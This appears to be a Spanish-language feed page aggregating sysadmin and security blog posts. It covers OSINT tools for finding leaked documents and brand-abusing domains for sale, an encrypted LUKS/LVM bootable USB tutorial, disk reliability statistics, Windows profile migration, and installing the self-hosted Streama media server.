Otro artículo para mi wiki personal. Desde hace un tiempo estoy trabajando con diferentes sistemas de clúster. Una tecnología que viene a referirse, en el caso de clúster de alta disponibilidad, a un mínimo...

La entrada Arrancar un clúster de Red Hat de manera ordenada se publicó primero en ochobitshacenunbyte.

20 Jan 10:23

Nakivo: Versión 7.3 final

by noreply@blogger.com (SYSADMIT .com)
20 Jan 10:23

Windows: Listar rutas largas

by noreply@blogger.com (SYSADMIT .com)
25 Nov 09:58

RastLeak III - Una tool para buscarlos a todos

by Naxhack5

Buenas,

Como ya sabéis RastLeak es una tool que prácticamente comenzó como un proyecto personal para automatizar la búsqueda de fuga de información basada en documentos indexados tirando contra un target así como sus subdominios. En su primera versión, empleaba como motor de búsqueda Bing:

 

RastLeak - Una tool para buscarlos a todos

 

Bing es un buscador bastante potente, sin embargo, desde mi punto de vista no puede llegar a competir con Google, por este motivo, decidí incorporar Google para ampliar el abanico de búsquedas, pues además, Google es mucho más flexible a nivel de Dorks teniendo unos resultados muy buenos. De ahí surgió un nuevo update:

RastLeak II - Una tool para buscarlos a todos, también con Google

que presenté oficialmente en la Hack&Beers Vol.8 de Madrid:

Hack&Beers Madrid - Vol 8 - RastLeak

Finalmente, optimicé el código e incorporé la funcionalidad de búsqueda de posible fuga de información fuera de la infraestructura del target, dónde además mi ex-compañero y amigo Rober, me dedicó un logo para la herramienta basado en uno de mis perros 😉

 

 

Visto el timeline, deje un poco aparcada RastLeak para dedicar tiempo a proyectos que tenía en mente, que presenté este mes en la HoneycCon17 de Guadalajara y  este finde en la Secadmin de Sevilla. Sin embargo, sí he sacado pequeños ratos para especialmente optimizar el código y obtener resultados más "limpios" y más usables para el día a día.

Si alguno echó un vistazo el código se encontraba todo en varias funciones en un mismo .py. Realmente funcionaba pero a la hora de incorporarlo como módulo para otros proyectos no era lo óptimo. Ya desde hace bastante, todos mis desarrollos (a no ser que sean muy precisos para una funcionalidad) los segmento en módulos para facilitar su uso, optimización y reciclaje de código.

Después de toda esta chapa, vengo a presentar un nuevo update de RastLeak (v.2.1) en el que se han incorporado los siguientes códigos:

  • Segmentación el código en módulos (todavía se podría segmentar más pero por el momento me vale).
  • Optimización y reciclaje de código.
  • Eliminación de duplicados en las búsquedas de Google. Al obtener los datos de la caché, en ocasiones se obtenían resultados duplicados.
  • Creación de una carpeta dónde se guarda:
    • .txt con las URL's indexadas.
    • Los documentos indexados identificados.
    • Excel con dos pestañas: una de resumen con la categorización de los documentos indexados y otra con la extracción de metadatos.
    • Mejorar la adaptación de resultados de Bing con Google cuando salta el recaptha de Google.

A nivel de resultados que un usuario ve no se identifican estos cambios de manera significativa, sin embargo, a la hora de visualizar la exportación de resultados sí.

A continuación, se muestra una PoC sobre la nueva versión de RastLeak, disponible en mi github:

 

Realizando una pequeña búsqueda con N=1 para el target uah.es:

Se obtienen resultados indexados en las siguientes URL's:

dónde se visualizan el tipo de documentos indexados:

 

Accediendo la directorio con el nombre del target se tienen los resultados exportados:

 

 

Del mismo modo, en la exportación a excel se tienen dos pestañas, una con el resumen de documentos encontrados

 

y otra con los metadatos extraídos:

 

 

Del mismo modo, debido a la cantidad de documento ofimáticos que se descargan automáticamente, una vez obtenidos los metadatos se eliminan.

Todavía tengo pendiente añadir duckduckGo como buscador así como exalead. Cualquier sugerencia e idea se agradece para futuras mejoras.

Espero que os sea útil este nuevo update.

Nos vemos en la siguiente entrada!

"La mejor defensa, es un buen ataque"

N4xh4ck5

09 Oct 18:29

Creación de un dispositivo de arranque cifrado

by Hartek

Buenas a todos!! Hoy voy a describiros un método sencillo para crear vuestros propios dispositivos arrancables, como puede ser un pendrive, disco duro o cualquier otro dispositivo de almacenamiento, estando los mismos enteramente cifrados. Estando cifrados, protegeremos nuestros dispositivos, por la razón que sea, contra cualquiera que potencialmente pueda llegar a tener acceso a ellos. En este caso, crearemos un pendrive arrancable cifrado con el sistema operativo Antergos. El proceso con cualquier otra distribución debería ser el mismo o muy parecido.

Para ello, primero una breve explicación del método a utilizar. Crearemos una partición de arranque (/boot) sin cifrar y otra que contendrá el propio sistema, utilizando para esta última el cifrado LUKS (Linux Unified Key Setup). LUKS describe un método de cifrado estandarizado y ampliamente utilizado sobre sistemas operativos Linux pero independiente de la plataforma. Sobre ella, crearemos un conjunto de volúmenes o particiones lógicas utilizando la tecnología LVM (Logical Volume Manager), que permite sobre una partición física realizar una subdivisión en varias subparticiones virtuales.

Esquema de particionado del dispositivo

Con este esquema conseguimos que hasta que no se consiga descifrar la partición cifrada con LUKS no podrá siquiera apreciarse el esquema de particionado lógico sobre la misma. Otros métodos válidos podrían ser cifrar con LUKS sobre particiones lógicas, o simplemente cifrar una partición física sin crear volúmenes lógicos. Dependerá de nuestras necesidades. En mi caso he elegido un particionado con volúmenes lógicos, aunque de momento solamente instale un sistema operativo, para poder ampliarlo en el futuro con otros fácilmente. Otras razones para los volumen lógicos podrían ser la separación de la partición /home o similares.

NOTA: Si es un dispositivo que hayamos utilizado antes, tal vez os convenga borrar completamente los datos que ha contenido. Por ejemplo, como se describe aquí.

Creación de la partición /boot

En este punto, lo más conveniente es arrancar directamente desde una ISO Live del sistema operativo que queramos instalar, como bien puede ser en este caso Antergos. De esta manera, realizamos todo el proceso de preparación e instalación desde el mismo sistema Live. Como he dicho antes, el proceso debería ser muy similar para cualquier otra distribución, dado que no vamos a hacer nada que sea exclusivo de Arch o similar.

Ahora, debemos crear la partición /boot de arranque. Entre otros métodos, podemos utilizar la herramienta fdisk, pero también otras como parted o gparted.

Con fdisk, ejecutaremos (asumiendo que nuestro dispositivo objetivo está identificado como /dev/sdb):

fdisk /dev/sdb

Acto seguido, podemos ir siguiendo paso a paso la creación. Pulsaremos n para una nueva partición, p para partición extendida y 1 como número de partición (dado que no hay ninguna aún). Estableceremos por último 110M (100 Megabytes) como tamaño de la partición. El mínimo es 100, y siempre es mejor pensar que sobre, ¡nos sobran gigas hombre!

Creación de la partición /boot de arranque

Creación de la partición del sistema

Lo siguiente que haremos en fdisk será crear la partición que contendrá el sistema operativo en el futuro. Podemos de hacerlo de forma muy similar a lo anterior.

Creación de la partición cifrada

Podemos ver la tabla de particiones que se creará introduciendo en fdisk la orden p. El resultado debería ser similar al siguiente:

Visualización de la tabla de particiones a crear

Escribiremos permanentemente estos cambios con la orden w. Saldremos automáticamente de la herramienta, y podremos ejecutar el siguiente comando para comprobar que todo ha salido correctamente:

fdisk -l /dev/sdb
Escritura de las particiones y comprobación

Creación del contenedor LUKS y los volúmenes logicos

Ahora podremos crear el contenedor cifrado LUKS dentro de nuestra partición de sistema (en nuestro caso y en adelante, /dev/sdb2) y posteriormente lo abriremos:

cryptsetup luksFormat /dev/sdb2

cryptsetup open /dev/sdb2 lvm

De esta manera, el contenedor se mapeará para su acceso en /dev/mapper/lvm.

NOTA: Es necesario tener instalado el paquete device-mapper para el paso anterior, dado que requiere el módulo de kernel dm-mod.

Creación y apertura del contenedor LUKS

Pasamos a crear ahora los volúmenes lógicos por encima del contenedor cifrado con LUKS utilizando LVM. Lo primero será crear un volumen físico que contenga la totalidad del contenedor cifrado. Este volumen físico referencia el espacio sobre el que crearemos volúmenes lógicos; puede ser uno solo, como es en este caso, o estar compuesto de varias secciones del mismo dispositivo o incluso diferentes.

pvcreate /dev/mapper/lvm

Acto seguido crearemos un grupo de volúmenes lógicos. Este componente simplemente aúna uno (en este caso) o varios volúmenes físicos, de manera que sobre ellos se creen volúmenes lógicos como si fuesen un mismo dispositivo de almacenamiento. Podemos llamarlo como queramos; en este caso simplemente lo llamaré lvm_vol.

vgcreate lvm_vol /dev/mapper/lvm
Creación del volumen físico y el grupo de volúmenes

Por último crearemos los volúmenes lógicos sobre este grupo. Como vimos en el primer esquema de la entrada, crearemos en nuestro caso únicamente un volumen destinado a la memoria SWAP (1GB debería bastar para sistemas modernos con mucha memoria, además de que si usamos un pendrive tenemos un espacio limitado). El resto del espacio del volumen lo ocuparemos con el volumen destinado a la partición de Antergos.

lvcreate -L 1G lvm_vol -n swap
lvcreate -l 100%FREE lvm_vol -n antergos
Creación de los volúmenes lógicos para SWAP y Antergos

Ahora sobre los volúmenes lógicos crearemos los sistemas de ficheros correspondientes (ext4 para el sistema, swap para la SWAP). Por último, los montaremos en nuestro sistema.

mkfs.ext4 /dev/mapper/lvm_vol-antergos

mkswap /dev/mapper/lvm_vol-swap

mount /dev/mapper/lvm_vol-antergos /mnt

swapon /dev/mapper/lvm_vol-swap

mkdir /mnt/boot

mkfs.ext2 /dev/sdb1

mount /dev/sdb1 /mnt/boot

Creación de sistemas de ficheros y montaje (opcional)

Esto es optativo, dado que en general en los asistentes de instalación de las distribuciones puedes crear en las particiones nuevos sistemas de ficheros. En otras, como Arch puro, debes hacerlo manualmente.

Instalación de Antergos

En este punto, deberemos instalar nuestro sistema operativo en la partición correspondiente. En caso de Antergos, podemos hacerlo con el instalador chchi incluido en el sistema Live.

No me entretendré mucho en explicar la instalación paso a paso, dado que ya lo hace Juan en este vídeo. Basta con seguir esos pasos, con estas salvedades:

  • Debemos seleccionar la instalación avanzada y elegir las particiones manualmente.
Selección de configuración manual de particiones
  • En dicha configuración manual, nos aparecerán los volúmenes virtuales arriba del todo. Editaremos cada entrada con su configuración correspondiente, en ningún caso marcando la opción de cifrado:
    • En el volumen mapeado como swap, seleccionaremos utilizar como swap y no formatear.
    • En el volumen mapeado como la partición de antergos, seleccionaremos utilizar como ext4, punto de montaje / y formateo.
    • En la partición /dev/sdb1, en la que se localizará /boot, marcamos utilizar como ext2 (también nos vale ext3/4) y punto de montaje /boot.
  • Marcaremos además como dispositivo de cargador de arranque /dev/sdb, el dispositivo completo sobre el que estamos trabajando.

 

Con estas salvedades, podemos continuar y dejar instalando el sistema operativo un rato hasta que acabe. El usuario, nombre de equipo, contraseña y demás lo dejo a vuestra elección, claro.

Configuración de mkinitcpio y el gestor de arranque Grub

Una vez se ha terminado de instalar el sistema, no hemos acabado aún, así que no salgas del sistema Live todavía. Dado que tenemos que arrancar sobre una partición cifrada, es necesario hacer un par de cambios en el mkinitcpio, un script que sirve para cargar módulos de kernel al arranque antes de pasar el control a init, y en el gestor de arranque Grub, que necesita saber que la partición del sistema está cifrada.

Para ello, primero tendremos que montar en /mnt el sistema Antergos y su partición boot para realizar cambios sobre ellas utilizando chroot. Además debemos montar los sistemas de ficheros virtuales del sistema Live, necesarios para ciertas operaciones dentro del sistema enjaulado con chroot.

mount /dev/mapper/lvm_vol-antergos /mnt

mount /dev/sdb1 /mnt/boot

for i in /dev /dev/pts /proc /sys /run; do sudo mount -B $i /mnt$i; done

chroot /mnt
Montaje de sistemas de ficheros necesarios para el chroot

Editaremos (utilizando vi o nano, de lo poco disponible dentro de chroot) el fichero /etc/mkinitcpio.conf. En la línea correspondiente a HOOKS debemos segurarnos de que su valor contiene los elementos lvm2, encryptkeyboard. Estos son los necesarios para manejar LVM, LUKS y que nos permita introducir con teclado la contraseña de cifrado en el arranque temprano.

Configuración de mkinitcpio

Hecho esto, editaremos también dentro de chroot el fichero /etc/default/grub, que contiene los datos de generación de la configuración del sistema de arranque Grub. En el campo GRUB_CMDLINE_LINUX introduciremos el siguiente valor:

cryptdevice=UUID=[UUID]:lvm root=/dev/mapper/lvm_vol-antergos

Donde [UUID] es la UUID del dispositivo /dev/sdb2, la partición física cifrada. Podemos ver este dato ejecutando blkid en consola.

Edición del fichero de configuración /etc/default/grub

Así, le estamos indicando al sistema de arranque que tendrá que ir a buscar un dispositivo cifrado en /dev/sdb2 que contiene un grupo de volumenes llamado lvm_vol, y que en este grupo debe buscar el sistema operativo raíz en /dev/mapper/lvm_vol-antergos, que es donde se mapeará una vez descifrada la partición con la contraseña.

Hecho esto, ejecutamos los comandos necesarios para generar el nuevo mkinitcpio.conf y generar la nueva configuración de Grub:

mkinitcpio -p linux
Generación del nuevo mkinitcpio
grub-mkconfig -o /boot/grub/grub.cfg
Generación de la nueva configuración de arranque

Y con esto todo debería estar hecho y funcionando. Reiniciamos, cruzamos los dedos muy fuerte y veremos que se nos muestra el Grub correctamente, y al iniciar Antergos se nos pide la contraseña de cifrado, tras lo cual todo se inicia correctamente. ¡¡Éxito!!

16 May 07:06

Estadísticas de fiabilidad de discos duros en 2017

by Alejandro Cobo López

BackBlaze ha publicado sus estadísticas sobre la fiabilidad de los discos duros que usan en sus datacenters. Los HGST no van mal y los Seagate siguen pinchando. No nada mejor que tener un centro de datos con decenas de miles de discos duros para sacar estadísticas fiables sobre la tasa de fallos de cada modelo … Sigue leyendo Estadísticas de fiabilidad de discos duros en 2017 →

The post Estadísticas de fiabilidad de discos duros en 2017 appeared first on HardLimit.

05 May 17:17

Migración de perfiles de usuarios en sistemas Microsoft con ProfWiz

by ragasys

Hola a tod@s.

En este post vamos a ver como migrar perfiles locales a perfiles de dominio en sistemas Microsoft, para ello utilizaremos la herramienta freeware ProfWiz, que nos la podemos descargar desde aquí:

  • Como podemos ver ya la tenemos descargada:

  • Una vez descargada la herramienta nos abrimos una sesión de administrador local en el equipo dónde queremos migrar el perfil local al perfil de dominio:

  • Ejecutamos la herramienta ProfWiz y se nos abre el siguiente asistente, dónde vamos a configurar los siguientes parámetros para la migración del perfil:

  • Seleccionamos el perfil del usuario que queremos migrar, en este caso, es un perfil local de Windows:

  • Le indicamos el dominio al que pertenece el equipo, si el equipo no está unido al dominio, marcamos el check “Join Domain”, nos pedirá las credenciales de administrador del dominio y lo unirá sin problemas, en este caso ya lo teníamos dentro del dominio RAGASYS, también le indicamos el usuario del dominio al que será migrado el perfil local:

  • Como podemos ver la migración del perfil local al perfil del usuario del dominio se ha realizado correctamente:

  • Al finalizar se nos reiniciará la máquina y para comprobar que se ha migrado correctamente, realizaremos un logon en el equipo con la cuenta de usuario del dominio:

  • Este documento txt lo cree antes de migrar el perfil para verificar que todo ha funcionado correctamente:

 

Saludos y espero que os resulte de ayuda 😉

05 May 17:10

Supporting MDM environments for the mobile apps of Exact Synergy Enterprise

by Sonja Bloemers - Blom

In January 2016, Exact made the CRM for Citrix app available for iOS and Android to see how the mobile apps for Exact Synergy Enterprise could work for a specific MDM environment.

After a year it is clear that supporting MDM environments in this way is very complex. Therefore, Exact has decided to support MDM environments via a different way and remove the CRM for Citrix app from the app stores.

Customers that want to use the mobile apps for Exact Synergy Enterprise in their specific MDM environment, can get in touch with our support department. They will get access to versions of the apps that they need to wrap for their specific MDM environment and will then be able to deploy it in their environment.

Note: Customers with a Citrix environment can refer to the following to help them wrap the apps:

23 Mar 09:00

fInd0 – Buscador de dominios en venta

by Naxhack5

Buenas!!!

En la entrada de hoy, os vengo a presentar el script fInd0, que se basa en un buscador de dominios en venta sobre un target. En esta primera versión del script, se buscan dominios en venta en el principal portal de compra/venta de dominios “Sedo“.

La idea de este script es identificar dominios registrados sobre un target que se encuentren en venta, los cuales se estén empleando para abuso de marca, es decir, que contengan logos o iconos registrados por una empresa o bien se emplea como parking de dominios.

El parking de dominios se basa en comprar un dominio que pueda ser interesante para alguna empresa en el mundo en un proyecto futuro y ponerlo en venta en el momento oportuno. La idea es ponerlo en venta al mejor postor, sin embargo, hasta que llegue una oferta se suele  emplear técnicas como direccionar todo el tráfico a una página de búsqueda o una página con anuncios del tipo Pay-Per-Click, donde los visitantes harán clic en los ads, y el propietario del dominio se llevará un porcentaje derivado de las ganancias.

Una vez visto su concepto, el fraude basado en el abuso de marca se basa cuando se registra un dominio que contiene el nombre de un marca registrada. Se está empleando el nombre de un marca registrada con objeto de llamar la atención a los usuarios para que accedan a él y por ejemplo, mostrar clics de búsquedas.

Como ya comenté en la ponencia que impartí en la última edición de la Hack&Beers de Madrid, empleando la técnica de hacking con buscadores también es posible identificar dominios que están cometiendo fraude a través de abusos de marca.

 

Como se puede observa en la captura, se trata de un restaurante que ha registrado un dominio empleando como parte del nombre una empresa muy conocida. Además, emplea su logotipo (se ha ofuscado), así como en la parte inferior un supuesto enlace a la intranet de dicha empresa.

La funcionalidad de este script es ejecutarla cada N tiempo, obtener todos los dominio en venta y examinar si alguno de ellos está cometiendo algún tipo de fraude.

Tras el sermón anterior (pero era necesario) 😉 vamos a ver la tool:

Se encuentro escrito en Python 2.7 y lo podéis encontrar en mi github 😉

 

Como PoC se van a buscar todos los dominios en venta del target paypal:

 

 

 

Como se puede observar, se obtienen bastantes resultados:

 

Para su tratamiento se permite su exportación en un formato estándar como json:

 

 

Espero que os resulte útil, la idea es añadir algunos portales de compra/venta de dominios al script para aumentar el alcance de los resultados.

Esto es todo por hoy. Nos vemos en la siguiente entrada 😉

Saludos.

N4xh4ck5

“La mejor defensa es un buen ataque”

29 Jan 19:49

Categorías de cableado Ethernet

by Oscar Gerometta
En redes Ethernet es habitual hablar de cableado categoría 5, y últimamente categoría 6. Pero con el paso del tiempo nos acostumbramos a la referencia estándar y olvidamos los detalles técnicos que están detrás de ella. Además, la elaboración de cableado de cobre ha evolucionado notablemente en los últimos años y nuevas categorías han aparecido. Por eso me pareció interesante hacer una
24 Jan 14:54

Cómo tener tu propio Netflix privado con Streama

by lagarto

Netflix es la herramienta de streaming por suscripción más importante en la actualidad, aporta todo lo que un amante de la televisión y las películas desea, contando con millones de suscriptores, miles de películas y series, excelente reproductor con traducciones de muy buena calidad, además con una potente tecnología para cargar los multimedias. Quizás la principal limitación de Netflix es su precio, que aunque no es alto, no es accesible para todos, es por esto, que ha surgido Streama que es una herramienta potente para crear nuestro propio Netflix gratis.tu propio netflix

Streama se adapta a diversas circunstancias y usuarios, los que no pueden disfrutar de Netflix o los que desean tener todas las películas y series organizada en una herramienta que se asemeje a la popular plataforma.

Esta poderosa herramienta está totalmente inspirada en Netflix, por los que conseguirá muchas similitudes en algunas de sus funcionalidades como: el Dashboard, el reproductor, la organización de los paneles, la info de las películas (que se extraen de IMDB),

¿Qué es Streama?

Streama es una herramienta libre, escrita utilizando Grails 2.4.4AngularJSHTML5 y MySQL por Antonia Engfors, que permite poner en marcha su propio netflix para hacer streaming de sus multimedias. En decir, esta herramienta nos permite organizar, almacenar y compartir nuestras películas, series, multimedias de manera fácil, rápida y con una interfaz muy similar al gigante de los streaming por suscripción.

¡Es cómo Netflix, pero gestionado y administrador por usted mismo!.

Lo que hace realmente estupenda está herramienta aparte de su parecido con Netflix, es su facilidad para agrupar películas y series, su excelente paneles administrativos y su integración con API de terceros, las cuales nos permitirán tener toda la información relacionada con nuestras películas, incluyendo sus trailers e imágenes.

De igual manera, con Streama podrás compartir películas con tus amigos, además la herramienta cuenta con la capacidad de reproducir un multimedia justo en la escena que se haya dejado la última vez.

Características de Streama

  • La herramienta perfecta para crear tu propio Netflix.
  • Fácil instalación y configuración.
  • Excelente administrador de Medios (Permite arrastrar y soltar, además de integración con theMovieDB.org para añadir automáticamente la información de la películas o serie).
  • Permite sincronizar la reproducción de una película con otros dispositivos, es decir, podrás desde 2 o más lugares, ver la película al mismo tiempo (sincronizando la reprodución, pausa, etc). ¡Esto es Grandioso!Streama Sincronizacion
  • Un gran reproductor de vídeo, con navegador por episodios y temporada incluido (visualmente muy similar al de netflix).Streama Reproductor
  • Agrupación por Categorías.
  • Múltiples Usuarios, con múltiples permisos (Es hora de compartir con cualquiera nuestros multimedias).Streama MultiUsuario
  • El sistema recuerda en que escena dejó una película o serie, permitiendole verla desde ese momento.Streama Continuar Viendo
  • Funcionalidad de películas y programas relacionados.Streama Programas Relacionados
  • Robusto explorador de Archivos.Streama file browser
  • Totalmente Open Source.

Disfrutando de tu propio Netflix

Para poder disfrutar de nuestro propio Netflix, necesitamos instalar Streama, vamos a explicar cómo hacerlo utilizando Docker y también cómo se haría de manera tradicional en Ubuntu.

Vale la pena destacar que para ambos casos necesitamos tener instalado Java JDK, en ubuntu podemos hacerlo de la siguiente manera: sudo apt-get install openjdk-8-jdk

Cómo instalar Streama con Docker

  • Lo primero que debemos hacer es descargar el código de Strema y construir:
git clone git@github.com:dularion/streama.git
cd streama
make
  • Luego vamos a ejecutar la Image Docker generada:
docker run -d -name=“streama” -p 8080:8080 -p 4000:4000 -v /data:/data -e “MYSQL_HOST=mysqlhost” -e “MYSQL_PORT=3306” -e “MYSQL_DB=streama” -e “MYSQL_USER=streama” -e “MYSQL_PASSWORD=streama” whatever/streama

Cada parámetro representa lo siguiente

  • -d Ejecutar cómo Daemon
  • MYSQL_HOST default: mysql
  • MYSQL_PORT default: 3306
  • MYSQL_DB default: streama
  • MYSQL_USER default: streama
  • MYSQL_PASSWORD default: streama
  • whatever/streama  Es el nombre de la imagen docker

Cómo instalar Streama en Ubuntu

wget https://github.com/dularion/streama/releases/download/v1.0.11/streama-1.0.11.war -O streama.war

  • Hacer ejecutable el .war

sudo chmod u+x streama.war

  • Descargar en el mismo directorio donde decargó el .wa el archivo sample_application.yml y renombrarla como application.yml.

wget https://raw.githubusercontent.com/dularion/streama/master/docs/sample_application.yml -O application.yml

  • Ejecutar la aplicación

./streama.war

Ingresando a Streama

Una vez hayamos ejecutado Streama debemos acceder a la url de inicio de sesión, que por defecto es: http://localhost:8080. Los datos de ingresos son username: admin y password: admin.

La primera vez nos tocará elegir el Directorio donde se subirán los multimedias, ingresar nuestra TheMovieDB API key, la URL de login (en caso de querer cambiarla), además la ruta de sus multimedias locales.

Comienza a gestionar tus películas y series

Una vez configurado Streama podrás gestionar fácilmente las películas y series que desee compartir, el proceso de gestión está muy bien ilustrado en el siguiente gif.

Streama Upload

Conclusiones sobre Streama

Sin duda alguna, estamos antes una de la mejores aplicaciones para tener nuestro propio Netflix, la misma a logrado combinar muy buenas características, además se planea a futuro extender cada una de sus funcionalidades.

La herramienta es ideal para aquellas personas que tienen una gran cantidad de películas y series, pero que desean gestionarla de mejor manera e incluso compartirla con sus amigos. La posibilidad de sincronizar la reproducción entre varios dispositivos, hará que podamos ver nuestros multimedias inclusos con nuestra familia a distancia (algo que agradezco enormemente).

La integración con API de terceros hace que la herramienta sea mucho más dinámica e interesante, además que contribuye con el enriquecimiento multimedia. No queda más que promocionar y recomendar está aplicación que desde ya está pasando a ser la favorita en mi servidor privado.

¿Y a ti que te parece la idea de tener tu propio Netflix privado?

Puedes saber más de Streama en el siguiente link

El artículo Cómo tener tu propio Netflix privado con Streama aparece primero en Cómo tener tu propio Netflix privado con Streama.